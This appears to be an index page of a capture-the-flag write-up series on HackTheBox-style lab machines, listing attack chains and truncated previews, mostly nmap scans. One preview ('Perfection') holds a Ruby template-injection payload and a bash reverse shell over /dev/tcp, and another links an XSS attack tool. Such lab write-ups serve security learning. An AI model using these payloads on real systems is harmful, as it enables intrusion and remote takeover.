meachines series

[Meachines] [Medium] Lightweight LDAP password sniffing + TRP00F automated privilege escalation + openssl privilege escalation

Information gathering. IP Address: 10.10.10.119, Opening Ports: TCP:22,80,389 $ nmap -p- 10.10.10.119 --min-rate 1000 -sC -sV PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4 (protocol 2.0)| ssh-hostkey:|

[Meachines] [Medium] Bitlab tag autofill login + GitLab + Docker lateral movement + Postgresql + reverse engineering

Information gathering. IP Address: 10.10.10.114, Opening Ports: TCP:22,80 $ nmap -p- 10.10.10.114 --min-rate 1000 -sC -sV PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; pr

[Meachines] [Easy] Safe BOF + ROP chain + .data section injection BOF + function jump BOF + KeePass password manager password cracking

Information gathering. IP Address: 10.10.10.147, Opening Ports: TCP:22,80,1337 $ nmap -p- 10.10.10.147 --min-rate 1000 -sC -sV PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol

[Meachines] [Insane] Bankrobber XSS-MDOG + SQLI + XSRF + Local-RCE + Bankv2 transfer simulation application buffer overflow

Information gathering. IP Address: 10.10.10.154, Opening Ports: TCP:80,443,445,3306 $ nmap -p- 10.10.10.154 --min-rate 1000 -sC -sV -Pn PORT STATE SERVICE VERSION 80

[Meachines] [Medium] SecNotes XSRF cross-site request forgery + SMB-Webshell upload + privilege escalation via leaked Linux subsystem command history

Information gathering. IP Address: 10.10.10.97, Opening Ports: TCP:80,445,8808 $ nmap -p- 10.10.10.97 --min-rate 1000 -sC -sV PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0| http

[Meachines] [Medium] Bastard Drupal 7 Module Services-RCE + MS15-051 privilege escalation

Information gathering. IP Address: 10.10.10.9, Opening Ports: TCP:80,135,49154 $ nmap -p- 10.10.10.9 --min-rate 1000 -sC -sV PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 7.5| http-methods:

[Meachines] [Easy] Optimum HFS file manager 2.3.x-RCE + MS16-032

Information gathering. IP Address: 10.10.10.8, Opening Ports: TCP:80 $ nmap -p- 10.10.10.8 --min-rate 1000 -sC -sV -Pn PORT STATE SERVICE VERSION 80/tcp open http HttpFileServer httpd 2.3|_http-server-header: HFS 2

[Meachines] [Easy] granny IIS 6.0 + CVE-2017-7269 + process migration + MS15-051 privilege escalation

Information gathering. IP Address: 10.10.10.15, Opening Ports: TCP:80 $ nmap -p- 10.10.10.15 --min-rate 1000 -sC -sV -Pn PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 6.0|_http-server-header: Micr

[Meachines] [Easy] Legacy nmap vulnerability scan script in-depth discovery + MS08-067

Information gathering. IP Address: 10.10.10.4, Opening Ports: TCP:135,139,445 $ nmap -p- 10.10.10.4 --min-rate 1000 -sC -sV -Pn PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC

[Meachines] [Medium] IClean

Main $ nmap -p- -sC -sV 10.10.11.12 -Pn --min-rate 1000 $ echo "10.10.11.12 capiclean.htb">>/etc/hosts This challenge may be related to Python SSTI $ gobuster dir --url "http://capiclean.htb" --wordlist /usr/share/s

[Meachines] [Easy] Perfection

Main $ nmap -sV -sC 10.10.11.253 --min-rate 1000 Developed in Ruby, so try Ruby SSTI injection x%0a<%25%3Dsystem("ping+-c1+10.10.16.23");%25> $ echo "/bim/bash -i >& /dev/tcp/10.10.16.23/10032 0>&1"|base64 categ

[Meachines] [Easy] Headless

Tools https://github.com/MartinxMax/MDOG for XSS attacks Main $ nmap -sC -sV 10.10.11.8 --min-rate 1000 Similar to a message board. Directory scanning reveals a dashboard $ gobuster dir -u "http://10.10.11.8:5000" -w /usr/share/wordlists/di